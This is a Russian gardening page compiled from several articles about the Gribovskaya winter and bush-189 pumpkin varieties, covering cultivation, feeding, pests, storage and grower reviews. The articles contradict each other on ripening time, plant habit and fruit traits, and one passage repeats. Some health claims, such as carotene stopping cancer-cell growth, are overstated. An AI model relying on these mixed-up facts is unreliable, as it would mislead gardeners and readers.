6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Тыква грибовская зимняя описание

Тыква Грибовская зимняя

Тыква Грибовская кустовая 189 была выведена советскими селекционерами и внесена в Госреестр, в 1964 году. Оригинатором сорта является ФГБНУ «Федеральный научный центр овощеводства», расположенный в Одинцовском районе Московской области. Культура данного сорта рекомендована к выращиванию во всех областях России.

Описание тыквы Грибовская зимняя

Тыква сорта Грибовская зимняя подходит для выращивания на приусадебных участках и фермерских полях, очень популярна среди огородников. Это позднеспелая, урожайная тыква, от появления всходов до сбора урожая проходит 130-140 дней.

Тыква Грибовская зимняя, по описанию и фото – длинноплетистая, мощная, с крупными желто-оранжевыми однополыми цветами, которые расположены поодиночке. Венчик колокольчатый, пятилепестковый. Листья темно-зеленые, крупно-лопастные. Растение стелется по земле или цепляется при помощи усиков к вертикальной опоре.

Тыква неприхотлива к условиям выращивания, хорошо растет в умеренном климате, стабильно дает урожай. Размер плодов – от 3 до 7 кг. Урожайность – 60 т/га или 6 кг/м 2 .

Описание плодов

Округло-приплюснутые, слабо сегментированные плоды массой до 7 кг созревают примерно через 4,5 месяца после появления всходов. Кожура серо-зеленая без рисунка и пигментации, не очень толстая. У желто-оранжевой мякоти однородная консистенция и сладкий вкус. Содержание сухих веществ – до 20%, сахаров – до 10%. Плоды имеют столовое назначение, хорошо хранятся и транспортируются.

Плоды тыквы Грибовская кустовая 189 очень полезны. Из них готовят диетические блюда, используют в лечебном питании гипертоников. В тыквенной мякоти много витаминов и минеральных элементов. Тыкву называют овощем молодости, в ней содержится каротин, который препятствует развитию свободных радикалов и росту раковых клеток.

При посадке рядом на участке твердокорой тыквы с кабачками и патиссонами возможно переопыление. Вкус и внешний вид созревших плодов будет значительно отличаться от ожидаемых, мякоть получится не такой сладкой и рассыпчатой.

Характеристики сорта

Тыква Грибовская кустовая, по отзывам – это светолюбивое и теплолюбивое растение, которое любит плодородную почву. Сорт позднеспелый, урожайный. Культура устойчива к болезням и вредителям, нетребовательна в уходе.

В средней полосе России тыкву кустовую зимнюю в открытый грунт высаживают в конце мая или начале июня. Семена на рассаду высевают в апреле-мае. Урожай убирают в сентябре через 130 дней после появления всходов. С одного куста можно собрать до 12 кг плодов.

Устойчивость к вредителям и заболеваниям

При выращивании тыквы Грибовская зимняя, как на фото, важно обеспечить ее питанием и влагой, правильно формировать куст. Тогда растение будет иметь иммунитет к болезням и неблагоприятным погодным условиям.

Сорт Грибовская зимняя устойчив к:

  • бактериозу;
  • мучнистой росе;
  • антракнозу;
  • белой и корневой гнили.

Иммунитет держится при соблюдении севооборота и проведении профилактических мероприятий. Для предупреждения грибковых и бактериальных болезней грядки пропалывают, мульчируют почву, поливают кусты «Фитоспорином», обрабатывают золой и настоем луковой шелухи.

Из вредителей на тыкве Кустовая зимняя могут поселиться:

Когда начинают завязываться плоды, используют народные методы борьбы: от клещей и слизней обрабатывают растения настоем чеснока, от тли – мыльным раствором.

Достоинства и недостатки

Описание сорта тыквы Грибовская зимняя дает огороднику достоверное представление о ее преимуществах. Плоды отличаются слабо выраженным ароматом, сладкой, однородной мякотью, без волокнистой структуры. Тыква может долго храниться без утраты вкуса. Достоинством сорта является устойчивость к болезням тыквенных культур и неблагоприятным погодным условиям. Грибовская зимняя при правильном уходе дает хороший урожай – с одного растения можно собрать до 12 кг плодов. Масса одной тыквы – от 3 до 7 кг.

К недостаткам можно отнести поздний срок созревания. Чтобы плоды успели вызреть в открытом грунте, тыкву Грибовская кустовая выращивают через рассаду. В открытый грунт пересаживают при температуре не менее +20 °C.

Технология выращивания

Для выращивания рассады отбирают крупные семена без повреждений. Тыквенные культуры не любят пересадок, у них чувствительная корневая система. Горшки для посадки выбирают диаметром 10 см с дренажными отверстиями на дне. Для проращивания семена тыквы помещают в марлю и смачивают водой. Ростки появятся на 3-й день, после чего семена сажают в горшки.

При посадке сухих, не проращенных семян, всходы появятся через 5-7 дней. На полноценное развитие саженцам тыквы необходимо 3 недели, если передержать дольше, они вытянутся, станут слабыми. Зная, что тыква не выносит холода, можно точно рассчитать время посева семян на рассаду в своем регионе, отсчитав 25-30 дней до высадки в открытый грунт.

Описание процесса выращивания рассады:

  1. Землю насыпают до половины высоты горшка, чтобы можно было подсыпать грунт, когда рассада начнет вытягиваться.
  2. Поливают водой с «Фитоспорином».
  3. Семена раскладывают по горшкам на ребро и присыпают 2 см слоем земли.
  4. Поливают по краю горшка или в поддон и накрывают пленкой или стеклом.
  5. Проветривают ежедневно 1-2 раза по 15 минут. Прорастание происходит при температуре +20-25 °C.
  6. Как только появились всходы, ставят их на свет возле южного окна.
  7. В первую неделю развития рассады желательно снизить температуру до +15-16 °C.
  8. Затем саженцы опять ставят в теплое место с температурой +18-20 °C.
  9. Поливают обильно, но нечасто.
  10. В открытый грунт высаживают крепкие саженцы с 3-4 настоящими листьями.

На участке, где растут тыквы, должно быть солнечно в течение всего дня. Согласно описанию агрономов, тыкву Грибовская кустовая можно сажать широкорядным или квадратно-гнездовым способом. В первом варианте посадки между рядами оставляют расстояние 1,5 м, а между растениями – 1 м. При квадратно-гнездовом способе между лунками и рядами делают одинаковое расстояние – по 1 м.

Участок под тыквенные посадки желательно готовить с осени. Почву перекапывают на глубину 50 см. Весной при посадке вносят удобрение в лунки, глубина которых должна быть не менее 10-12 см. Добавляют по литровой банке перегноя или компоста и 0,5 ст. древесной золы в каждую посадочную яму, перемешивают с землей и поливают. Рассаду пересаживают методом перевалки.

В процессе ухода проводят рыхление грядки. Сорт тыквы Грибовская зимняя поливают один раз в неделю. Под молодые растения вносят по 3 л воды. Во время цветения и завязывания плодов на каждый куст тыквы расходуют по 5 л. Если погода холодная, накрывают тыкву спанбондом.

Когда плети вырастут на 1,3-1,5 м, прищипывают макушку. Боковые побеги прищипывают после того, как на них завяжется по одному плоду. Кусты при таком способе получаются небольшими, плоды растут хорошо.

Подкормки вносят не менее двух раз за время вегетации – под каждый куст по 2 л питательного раствора по влажной земле:

  • когда появятся всходы, поливают раствором коровяка или навозной жижей в расчете 1:10 с добавлением 1 ст. древесной золы;
  • перед цветением подкармливают нитрофоской (1 ст. л. на 10 л воды).

Тыкву твердокорую Грибовская кустовая необходимо убрать до заморозков. Если кожица будет повреждена, это негативно отразится на сроке хранения. Первым сигналом к уборке плодов можно считать увядшие от мороза георгины, если они есть на участке. Собранные тыквы желательно выдержать на хранении 1-2 месяца перед употреблением в пищу, за это время мякоть наберет сладости и аромата, дозреет.

Заключение

Тыква Грибовская кустовая 189 отличается неприхотливостью в уходе, урожайностью, отличным вкусом плодов. Это один из лучших сортов для длительного хранения. Из-за позднего срока созревания рекомендуется выращивание через рассаду. На плодородной почве при хорошем освещении, правильной посадке и формировании куста дает большой урожай. За время вегетации достаточно двух подкормок.

Тыква Грибовская: описание, выращивание

В статье представлена тыква Грибовская: описание сорта, правила выращивания.

Из тыквы можно приготовить очень многие блюда. Дети и взрослые с удовольствием едят тыквенные каши, супы, пьют сок с тыквенной мякотью. К тому же, это ещё и диетический продукт. В тыкве очень мало калорий, поэтому вы всегда будете стройными, употребляя в пищу ароматные тыквы.

Следует отметить то, что выращивание этой культуры достаточно простой процесс. Вам нужно лишь соблюдать определенные правила агротехники, а в будущем наслаждаться прекрасным урожаем. Сегодня мы вам расскажем о тыкве Грибовской кустовой, которая была выведена ещё в советском союзе в 1964 году. Да, о вещах, произведенных в СССР говорят — знак качества, поэтому советские сорта овощных культур также высоко ценятся в современном мире. Эта культура может произрастать практически во всех регионах России, поэтому, где бы вы ни жили: на севере или на юге, вам обязательно нужно познакомиться с этим сортом.

Тыква Грибовская: описание

Тыква Грибовская: описание

Выращивание тыквы Грибовской занимаются как на приусадебных участках, так и в промышленных фермерских масштабах. Поэтому она считается очень популярной на аграрном рынке. Это позднеспелый сорт, однако, тыква дает обильный урожай, поэтому через 130-140 дней после появления первых всходов, вы сможете порадовать себя ароматной тыквы. Завязи располагаются поодиночке. Цветочки напоминают колокольчик с пятью лепестками. Говоря о форме листьев, следует упомянуть: обычно они крупные с характерным темно зеленым окрасом.

Этот сорт выращивают как на земле, так и прицепляют его к какой-либо опоре. Поэтому очень часто огородники сажают эту тыкву на вертикальные грядки. Хорошо подойдёт и замена опоры рядом стоящей сельхоз постройкой. Плети могут цепляться за стены, образуя множество завязей.

Как мы уже отмечали, это тыква очень неприхотлива к климатическим условиям, поэтому она прекрасно чувствует себя и в умеренном климате, и в субтропическом. В среднем один плод весит от 2 до 7 килограмм. На один квадратный метр приходится примерно 6 кг плодов. Тыковки обычно сегментированные с характерным окрасом, шаровидной формы, слегка приплюснутые по краям.

Созревают плоды обычно дружно через четыре-пять месяцев от появления первых всходов. Плоды обычно имеют матовый окрас, в отличие от многих медовых сортов тыквы, плоды этого сорта серо-зеленые. Кожура достаточно тонкая, а вот мякоть плотная. По консистенции однородная, с ярко выраженным сладким вкусом. Плоды этого сорта употребляют в пищу как в свежем, так и в переработанном виде. Эта тыква хорошо хранится и транспортируется на дальние расстояния. Поэтому вы можете смело отправляйте её с дачи в город. Очень часто мякоть тыквы используют гипертоники для приготовления диетических блюд. В этой тыкве много содержится каротина, витаминов и микроэлементов. Благоприятно влияет этот продукт и на иммунитет человека, а также на работу пищеварительного тракта.

Сажая эту тыкву у себя на участке, помните, высаживать ее рядом с кабачками или патиссонами не нужно, так как эти культуры способны переопыляться. Поэтому в дальнейшем вкус и цвет таких плодов будет отличаться от ожидаемых. Лучше всего сажать тыкву рядом с бобовыми культурами, пасленовыми. Со временем, эта тыква только хорошеет, опытные огородники говорят о том, что через месяц после сбора урожая кусочки тыквы становятся ещё ароматнее и слаще.

Тыква грибовская кустовая: немного о сорте

Тыква грибовская кустовая: немного о сорте

Как мы уже отмечали ранее, Грибовская тыква относится к позднеспелым сортам. Урожай можно будет собирать через 4-5 месяцев после появления всходов. Это достаточно теплолюбивые и светолюбивые растения. Поэтому сажать их лучше на хорошо освещенном участке. К тому же, эта тыква очень любит плодородную и хорошо структурированную почву. Урожай у тыквы отменный и обильный, а сама культура очень неприхотлива. Следует отметить и то, что тыква устойчива к вредителям и болезням, однако профилактические осмотры стеблей и листьев все же осуществляет нужно.

Обычно этот сорт тыквы высаживают в открытый грунт в конце весны — в начале лета. Если же вы решите сажать тыкву рассадным способом, то посев семян в теплице следует производить уже в апреле. Урожай собирают обычно осенью, однако ее плоды хранятся вплоть до следующего лета. Все зависит от условий хранения. От одного растения вы можете получить до 10-12 кг спелых плодов. Однако если вы будете за тыквой хорошо ухаживать, то и урожайность будет выше.

В процессе выращивания важно правильно сформировать кусты, а также вовремя подкармливать и поливать растения. Несмотря на то, что тыква хорошо переносит засуху, вовремя осуществлять полив все же придется. Особенно важно в период вегетации обильно увлажнять почву, а вот во время сбора урожая растения вообще плевать не нужно. У этого сорта тыквы достаточно хороший иммунитет, поэтому она устойчива к различным неблагоприятным явлениям.

Если говорить о заболеваниях, то следует отметить устойчивость Грибовской к мучнистой росе, гнили и бактериозу. Однако растения не болеют только в том случае, когда вы правильно за ними ухаживаете. Для того чтобы предупредить развитие бактериальных и грибковых заболеваний, вам нужно регулярно мульчировать почву, поливать растения, а также пропалывать грядки. Иногда листья и стебли обсыпают золой или обрабатывают раствором из воды и луковой шелухи, для того чтобы предотвратить развитие многих заболеваний. Говоря о вредителях, заметим, на тыкве могут поселиться гусеницы, слизни и паутинные клещи. Хорошо приживается на Грибовской и тля. Поэтому вовремя обрабатывайте листья и стебли растений мыльным раствором или настойкой из чеснока.

Тыква грибовская: описание плюсов и минусов

Тыква грибовская: описание плюсов и минусов

У каждого сорта есть свои плюсы и минусы, поэтому было бы неправильно о говорить только о достоинствах тыквы, так что рассмотрим все стороны процесса выращивания Грибовской. Из преимуществ огородники отмечают высокую урожайность, отличные вкусовые качества плодов с характерным ярко выраженным ароматом и сладостью, однородность структуры мякоти, а также устойчивость к неблагоприятным погодным факторам. К тому же, этот сорт тыквы устойчив к различным болезням, а его плоды очень долго хранятся, со временем лишь раскрываясь во вкусовом качестве. Средняя масса одной тыковки составляет от 2 до 7 кг, причём вес плодов зависит от условий выращивания. От одного растения вы можете получить до 12 килограмм спелых и ароматных тыковок.

Отмечая недостатки, следует указать на то, что у этого сорта тыквы длительный вегетационный период, поэтому, если в вашем регионе короткое и холодное лето, не все плоды успевают вызреть. А значит, вам придется выращивать ее через рассаду, а это уже более длительный процесс и кропотливый. Этот сорт тыквы также требователен к плодородности почвы и к температуре во время пересаживания, поэтому, несмотря на устойчивость к заморозкам, сажать тыкву лучше всего в хорошо прогретую почву.

Правила агротехники

Как правильно выращивать тыкву должен знать каждый огородник. Сейчас мы вам расскажем об особенностях агротехники. Прежде чем сажать тыкву, вам нужно выбрать хороший семенной материал. Для этого вам нужно удалить все семена с повреждениями и дефектами. Помните о том, что их лучше всего сначала продезинфицировать, а затем прорастить, для того чтобы ростки развивались интенсивнее.

Это овощная культура не очень любит пересадки, так как корневая система плохо адаптируется к новым условиям, поэтому сразу сажайте семена в индивидуальные ёмкости. В горшочках лучше всего сделать дренажные отверстия, для того чтобы оттуда выходила лишняя влага. В каждый горшочек сажают по два-три семечка, для того чтобы увеличить процент всхожести, после того как ростки покажутся, лишнее удаляют. Если вы будете сажать семена без проращивания, то первые росточки появятся только через неделю. Так рассаду надо будет выращивать в течение 3 недель, а потом пересаживать в открытый грунт. Учитывая этот показатель, заранее рассчитывайте время посадки семян на рассаду.

Высадка в открытый грунт — в конце мая — начале июня. Грунт для выращивания рассады либо покупают в специализированном аграрном магазине, либо готовится самостоятельно, смешивая в равных частях перегной, песок и обычную землю с участка. Желательно эту самую землю предварительно прокалить, для того чтобы сорные растения не мешали рассаде. Семена следует прикрывать землей не более чем на 2 сантиметра, так как росткам при глубоком залегании семенного материала будет труднее пробиться. По завершении посева горшочки лучше всего накрыть пленкой, это необходимо делать для того, чтобы создать благоприятный внутренний климат.

После появления всходов пленку снимают и ставят горшки на подоконник, со временем рассаду нужно будет закалять, ведь таким образом ей будет проще в будущем приспособиться к новым условиям произрастания. В открытый грунт можно высаживать рассаду после того, как на растениях появятся по три-четыре листочка. На месте произрастания тыквы должно быть солнечно, а участок хорошо защищен от ветра.

Следует отметить то, что плети тыквы занимают достаточно большую площадь вокруг центрального стебля, поэтому лучше всего сажать этот сорт квадратно-гнездовым способом. При этом вам нужно оставлять между растениями расстояние не менее чем один метр. Лунки под посадку начинают готовить еще осенью. Участок перекапывают лопатой, а затем вносят туда удобрение.

Для этого используют минеральные, комплексные удобрения и органику. Часто в почву добавляют перегной или компост, а также древесную золу, для того чтобы структурировать почву, сделать её рыхлой и воздушной, после высадки вам нужно будет интенсивно полить саженцы водой, а затем повторять процесс поливки примерно один раз в неделю. Больше всего воды следует вносить в период вегетации, а во время сбора поливать тыкву совсем не нужно.

НА боковых побегах оставляйте по одному плоду, так как остальные вызреть не смогут. В период вегетации хорошо для развития плодов вносить под кусты минеральные удобрения, а также раствор коровяка, навозную жижу и нитрофоска. Все это нужно предварительно развести в воде.

Убирают этот сорт тыквы до заморозков, так как кожица плодов должна быть обязательно целостной, а сами тыквы неповрежденными, иначе урожай не будет долго храниться. Тыкву рекомендуют употреблять в пищу через месяц после сбора урожая, ведь в процессе хранения ее вкусовые качества улучшаются, а мякоть дозревает.

Заключение

В заключении следует отметить то, что этот сорт тыквы неприхотлив в уходе, а вот урожайность высокая, плоды имеют отличные вкусовые качества, а также приятный аромат. Тыковки можно транспортировать на дальние расстояния и долго хранить. А при правильном уходе этот сорт обязательно порадует вас вкусным и ароматным урожаем!

Как вырастить тыкву «Грибовскую кустовую»: секреты агротехники

Люди выращивают тыкву на протяжении 5 тысяч лет. За это время были созданы сотни сортов, разновидностей и подвидов. Проверенный временем сорт Грибовская кустовая популярен среди огородников благодаря отличному вкусу мякоти, высокой урожайности, неприхотливости в уходе и длительному хранению плодов.

Описание сорта

В 1964 году советскими селекционерами была выведена разновидность кустовой культуры — Грибовская кустовая. Сорт рекомендован для выращивания во всех регионах России.

Подвид 189

Грибовская кустовая 189 — один из старейших и известных у овощеводов сортов культуры. Подвид 189 выращивают в Северо-Западном регионе, на Урале и в Сибири. Культивируют на приусадебных участках, в полях.

Сорт раннеспелый: от появления всходов до сбора плодов проходит 86–98 дней.

Для справки. Позднее, в 1972 году, вывели еще один родственный сорт — крупноплодную Грибовскую зимнюю.

Отличительные черты

Подвид 189 — вкусная и неприхотливая тыква. Растения любят тепло, свет, плодородную почву, устойчивы к вредителям и болезням. Сами кусты мощные, но не плетистые, компактные. Листья крупные.

Посев в открытый грунт производят в начале мая, выращивать рассаду начинают за 2-3 недели до пикировки на постоянное место.

Характеристика плодов и урожайность

Тыква Грибовская кустовая отличается большими плодами: от 3 до 5 кг. По форме они напоминают кабачок, продолговатые, у плодоножки сужаются. Поверхность гладкая или слаборебристая, твердая кора. Окраска зрелых тыквин светло-оранжевая с темно-зелеными полосами.

Мякоть плотная сладкая, содержит много семян, универсальна в кулинарии. В плодах содержится в 5 раз больше бета-каротина, чем в моркови.

Культура урожайная: с 1 м 2 получают до 8 кг (30–40 т/га).

Как выращивать

Агротехника сорта практически не отличается от выращивания других тыквенных сортов.

О других сортах тыквы:

Посадка семенами и рассадой

В зависимости от климата выбирают способ культивации: семенами на грядки или рассадой. В холодных регионах предпочтительнее рассадный метод. Схема посадки — 60х60 см.

Выращивание рассады:

  1. Слабым раствором марганца дезинфицируют семена для защиты будущих ростков от болезней.
  2. Выбирают теплое освещенное место с температурой воздуха около +20…+25 °C.
  3. Семена высаживают в индивидуальные емкости или торфяные горшочки, которые наполовину заполняют почвенной смесью из перегноя, торфа и дерновой земли (2:1:1). Сверху засыпают тем же субстратом, но с добавлением 10–15 г золы и настоем коровяка.
  4. Почву увлажняют, закрывают пленкой для создания парникового эффекта и сохранения необходимой влаги.
  5. Поливают сеянцы умеренно, подкармливают дважды минеральными удобрениями.
  6. За неделю до пикировки растения закаляют: выносят их на свежий воздух, постепенно увеличивая время до длины светового дня.
  7. Высаживают в открытый грунт, когда устоится теплая погода (в конце мая – начале июня).

Перед посевом сразу на грядки посадочный материал подготавливают:

  1. Семечки в течение нескольких дней прогревают в духовом шкафу или у батареи.
  2. В соляном растворе (1 ч. л. соли на 1 ст. воды) проверяют экземпляры на непригодность. Всплывшие зерна выбрасывают, остальные промывают.
  3. Затем семена проращивают: выкладывают их во влажную марлю и ставят в теплое место до появления проростков.

Посев производят, когда температура почвы на глубину 10 см прогреется до +12…+15 °С. Выбирают защищенные от ветра, хорошо освещаемые участки, на которых раньше росли картофель, лук, бобовые культуры.

Саму землю еще с осени перекапывают, удаляют сорняки, вносят удобрения (5 кг перегноя, 30 г суперфосфата, 15 г хлористого калия на каждый м 2 ). Если почва кислая, добавляют мел или доломитовую муку. Торф и песок улучшат структуру грунта.

Перед высадкой грядки снова рыхлят, очищают от сорной травы, добавляют 20 г аммиачной селитры на 1 м 2 . Заглубляют семена на 5–8 см, почву увлажняют. Расстояние между рядами — не менее 1 м. В первое время культуру проращивают под укрывным материалом.

Тыква поливают регулярно теплой водой, не менее 2 раз в неделю (если лето выдалось жарким, частоту орошений повышают до 4 раз). Азотные подкормки улучшают развитие культуры. Во время формирования плодов используют фосфорно-калийные удобрения.

При истощении почвы делают следующее:

  • через 10 дней после посадки вносят в грунт раствор из 1 л навоза на ведро воды либо из 10 г нитрофоски на 10 л жидкости;
  • при плодоношении применяют этот же состав.

Удобряют овощи 3-4 раза за сезон. Вместо навоза можно использовать помет, настой трав.

Кусты Грибовской тыквы прищипывают, чтобы питательные вещества шли на рост плодов. Лишние завязи удаляют, как только они появились. Оставляют по 2-3 завязи. Рыхлят землю после каждого полива для лучшего поступления кислорода к корням, делают это осторожно, чтобы не повредить растения.

Особенности выращивания и возможные трудности

Правильно выбранное место посадки — один из главных моментов культивации. Участок не должен быть затененным. В регионах с холодным климатом сооружают парники.

Несмотря на то, что культура нуждается в регулярных поливах, их сокращают до образования завязей, иначе мясистыми станут листья, а не будущие плоды. Поливают только теплой отстоянной водой, чтобы избежать гниения корней и увеличить срок хранения овощей.

В период созревания плодов полив прекращают. Так мякоть станет более сладкой.

Советы по выращиванию

Дачники в лунки перед высадкой семян наливают немного горячей воды для прогревания почвы и ее обеззараживания.

При выращивании тыквы рассадой уделяют внимание температуре воздуха: до появления всходов оптимальные показатели +20 °C днем и +16 °C — ночью. В течение следующих 6 дней температуру снижают до +15 °C и +12 °C соответственно, а затем возвращают к изначальным характеристикам. Это предотвратит вытягивание рассады. Сами сеянцы не поливают, а опрыскивают.

Для лучшего поступления солнечных лучей с началом созревания плодов у растений убирают лишние зеленые листья. Чтобы защитить культуру от заморозков, в лунки устанавливают пластиковые емкости (5 л) с обрезанным дном.

Болезни и вредители

Грибовская кустовая относительно устойчива к гнилям, но нередко болеет мучнистой росой и бактериозом:

Бактериоз

Проявляется темно-зелеными пятнами между жилками листьев. С нижней стороны пластины маслянистые. Через некоторое время пятна темнеют, высохшие фрагменты осыпаются, на листьях возникают дыры. Пораженные участки кустов удаляют.

Мучнистая роса

На листьях появляются белые пятна округлой формы, поражаются стебли, растения увядают. Для борьбы с заболеванием культуру опрыскивают сернистыми средствами.

Белая гниль

Надземные части покрываются темными пятнами, слизью. Плодоносящие кусты гибнут в первую очередь. Больные участки убирают, кусты обрабатывают медным купоросом.

Корневая гниль

Корни становятся коричнево-серыми, трескаются. Нижние листья желтеют, тыква перестает развиваться. В качестве профилактики избегают переувлажнения почвы, при излишке жидкости подсыпают сухую землю.

Заболевания проявляются в сырую погоду и при поливе холодной водой. Прополка и удаление сорной травы предотвращают появление грибков.

Вредители

Бахчевая тля и паутинный клещ — основные вредители культуры. Для борьбы с ними используют настойку из чеснока, коллоидной серы и пищевой соды или специальные препараты.

Сбор и применение урожая

Грибовскую кустовую 189 собирают через 80–90 дней после посадки. Созревшие плоды оранжевого цвета с зеленой ножкой, которая высохла и стала похожа на пробку. Срезают овощи вместе с плодоножкой, оставляя длинный хвостик.

После сбора урожай хранят в теплом сухом помещении (около +10 °C), можно на солнце. При повышенной влажности воздуха плоды не будут храниться больше 2 месяцев.

В погребе для овощей делают специальные стеллажи. Тыквины укладывают хвостиками вверх, недалеко друг от друга, но не вплотную. Периодически осматривают плоды и выкидывают те, которые начали гнить. Для продления срока хранения поврежденные участки коры смазывают антисептиком и заклеивают пластырем.

Используют овощи для употребления в свежем виде, добавления в различные блюда, диетического питания.

Преимущества и недостатки сорта

Преимущества Грибовской кустовой тыквы:

  • возможность длительного хранения;
  • относительная устойчивость к гнилям плодов;
  • подходит для лечебного и диетического питания;
  • приятный вкус мякоти с высоким содержанием сахаров;
  • неприхотливость к погодным условиям;
  • компактность кустов;
  • высокая урожайность.

Как таковых недостатков у культуры нет.

Отзывы фермеров

Овощеводы отмечают хороший вкус плодов, их возможность использования в кулинарии, неприхотливость культуры в уходе и устойчивость к погодным условиям:

Екатерина, Челябинская область: «Выращиваю этот сорт давно. С детства помню, как он рос у бабушки на огороде. Грибовская кустовая неприхотлива в уходе и прекрасно приживается в климате Челябинска. Высадку произвожу, когда земля хорошо прогреется. Культивирую в открытом грунте, не в теплице. Из Грибовской тыквы люблю рагу и варенье».

Татьяна, г. Волгоград: «Мне понравились фотографии плодов и их описание, что подтолкнуло на покупку сорта. В пакетике 11 семян, но взошло только 2. Сделала высадку в июне. Плети выросли мощные. С 2 кустов урожай получился в 5 плодов. Два крупных, по 5-6 кг, и три среднего размера. Мякоть очень сладкая, но, к сожалению, суховата. Из тыквы получилась отличная каша, однородная и без волокон».

Сергей, г. Нижний Новгород: «Тыква Грибовская кустовая помнится с детства, мякоть у нее была сочная и сладкая. Когда увидел семена в магазине, купил один пакетик. В нем 4 семечка, одно было повреждено, из оставшихся других выросло 3 куста рассады. Тыкву высадил в тени и на даче появлялся редко. Если судить по всем нормам и правилам ухода за культурой, то урожая можно было и не ждать. К своему удивлению, осенью нашел в траве 6 тыкв весом от 2 до 3 кг. Дома они хранились до декабря, а когда разрезал, мякоть была сладкой, но не такой сочной, как в детстве».

Заключение

Грибовская кустовая 189 — один из лучших сортов тыквы. Он отличается неприхотливостью, иммунитетом к основным болезням, высоким урожаем крупных сочных плодов. Благодаря полезным свойствам культуры и низкой калорийности ее применяют в кулинарии, добавляют в лечебные и диетические рационы.

Плоды долго хранятся без потери вкусовых и товарных качеств.

Тыква Грибовская: характеристика, особенности выращивания

Бытует мнение, что для выращивания тыквы необходимо много места, поскольку она стелется и плетётся, для чего и требует достаточно пространства. Учёные-селекционеры решили эту проблему — вывели кустовые сорта, которые довольно компактны и ничем не уступают остальным. Рассмотрим более детально представителя данного вида — тыкву сорта Грибовская.

Описание сорта

Сорт раннеспелый: от прорастания всходов до сбора урожая требуется от 90 до 100 дней. Представляет собой ветвящийся куст с крупными пятиугольными среднерассечёнными листами с черешком более 30 см. Плод овальный. Поверхность чаще всего гладкая, но может быть и слаборебристая.

Достоинства и недостатки

Выбирая сорт для выращивания, важно учитывать все его положительные стороны.

  • К плюсам Грибовской тыквы относят:
  • Компактность. Растение кустообразное, что значительно экономит расход земельной площади, в отличие от сортов, которые стелятся.
  • Скороспелость. Нужно не более 100 дней для получения спелого овоща, в то время как другие сорта спеют около 120 дней.
  • Устойчивость к низким температурам.
  • Высокая урожайность.
  • Хорошие транспортировочные качества. Мякоть плодов довольно плотная, покрыта твёрдой кожурой, что значительно упрощает процесс перевозки и хранения.
  • Стойкость к болезням.

Несмотря на все вышеперечисленные достоинства, выделяют также один недостаток данного сорта — твёрдую кожуру плодов. Хоть это и способствует хорошей сохранности плода, но при использовании в кулинарии считается недостатком.

Особенности посадки семян в открытый грунт

Технология посадки — основа в выращивании тыквы, ведь именно от этого этапа зависит количество всходов и плодоносящих кустов.

Сроки

Тыква — теплолюбивая культура, для её выращивания необходима температура около +25°С, поскольку уже при +14°С растение останавливает свой рост. Сроки посева определяют по погодным условиям, пригодной для посадки считается почва, прогретая до +12. +15°С на глубине до 10 см. Такие показатели приходятся примерно на начало мая.

Выбор места и севооборот

Для культивации тыквы отлично подойдут защищённые от ветра и хорошо прогреваемые солнцем участки. Почва должна быть плодородной с глубоким пахотным слоем. Что касается севооборота, идеально подойдёт участок после лука, картофеля, корнеплодов и бобовых. Не рекомендуется высаживать тыкву после огурцов, кабачков и патиссонов, во избежание заражения растений общими вредителями и болезнями. Нередко культуру высаживают вместе с картофелем, как по периметру, так и между грядками.

Подготовка грядки

Готовят землю под посадку ещё с осени, перекапывают и вносят минеральные вещества из расчёта на каждый 1 м²:

  • перегной — 5 кг;
  • суперфосфат — 30 г;
  • хлористый калий — 15 г.

Если под посадку отведена тяжёлая глинистая почва, рекомендуют дополнительно внести в равных количествах песок и торф, по 15 кг на 1 м². Весной разравнивают верхний слой почвы с помощью грабель и удаляют сорную траву. За неделю до посева грунт перекапывают на глубину 15 см и вносят 20 г аммиачной селитры на 1 м².

Схема посева

Мелкие семена выбраковывают, а отобранный материал проращивают. Для этого семена выдерживают 4 часа в воде, подогретой до +50°С. Затем семена выкладывают на влажную ткань до их проклёвывания. После этого можно приступать к высадке. Формируют лунки глубиной 5–8 см на расстоянии 90 см. Опускают ростки в землю, аккуратно засыпают их и обильно поливают.

Последующий уход за растением

Следующим важным этапом в выращивании тыквы считают агротехнику, ведь она направлена на увеличение массы плодов, а также на формирование вкусовых качеств культуры.

Полив

Растению необходим частый и обильный полив, особенно в период цветения и образования завязей. Поливают водой температурой от +20°С не менее 2 раз в неделю, а в условиях засухи — 4 раза.

Внесение удобрений

При засухе удобрения вносят в виде водных растворов, при влажной погоде используют в сухом виде. Проводят подкормку после образования 5 листов, после чего повторяют при формировании петли. Затем подкормки проводят каждые 2 недели.

В качестве удобрений используют:

  • нитрофоску — 10 г на один куст;
  • золу древесную — посыпают почву после полива и рыхления из расчёта 100 г на один куст;
  • коровяк — разводят водой в соотношении 1:8, рекомендуют вносить в начале роста, а также во время плодоношения.

Прищипывание

Кусты тыквы сорта Грибовская прищипывают. Для этого удаляют лишние завязи и боковые побеги сразу после их появления. На стебле оставляют 2–3 завязи. Таким образом, все питательные вещества будут направлены на рост плодов, а не на формирование зелёной массы.

Прополка и рыхление

Данные процедуры проводят после каждого полива. Рыхлят почву с целью увеличения её проницаемости, делают это аккуратно, чтобы не повредить корневую систему куста.

Сбор и хранение урожая

Собирают урожай в зависимости от климатических условий: в сентябре-октябре. Главное: успеть до первых заморозков. Плод срезают вместе с плодоножкой длиной около 4 см, что обеспечивает более длительное хранение тыквы. Для сберегания подойдут сухие, хорошо вентилируемые и тёмные помещения с температурой не выше +15°С и показателем влажности воздуха на уровне 70–80%. Укладывают овощи на солому, таким образом, чтобы плоды не соприкасались друг с другом. Кожура тыквы устойчива к высыханию, поэтому плоды хранятся довольно долго, около 6 месяцев.

Культивировать тыкву на своём участке могут практически все, ведь эта культура не требует особых условий для своего произрастания. Тыква сорта Грибовская отличается компактными размерами и вкусной мякотью, а если её правильно хранить, то можно наслаждаться полезным овощем до самой весны.

Тыква Грибовская: описание, выращивание

В статье представлена тыква Грибовская: описание сорта, правила выращивания.

Из тыквы можно приготовить очень многие блюда. Дети и взрослые с удовольствием едят тыквенные каши, супы, пьют сок с тыквенной мякотью. К тому же, это ещё и диетический продукт. В тыкве очень мало калорий, поэтому вы всегда будете стройными, употребляя в пищу ароматные тыквы.

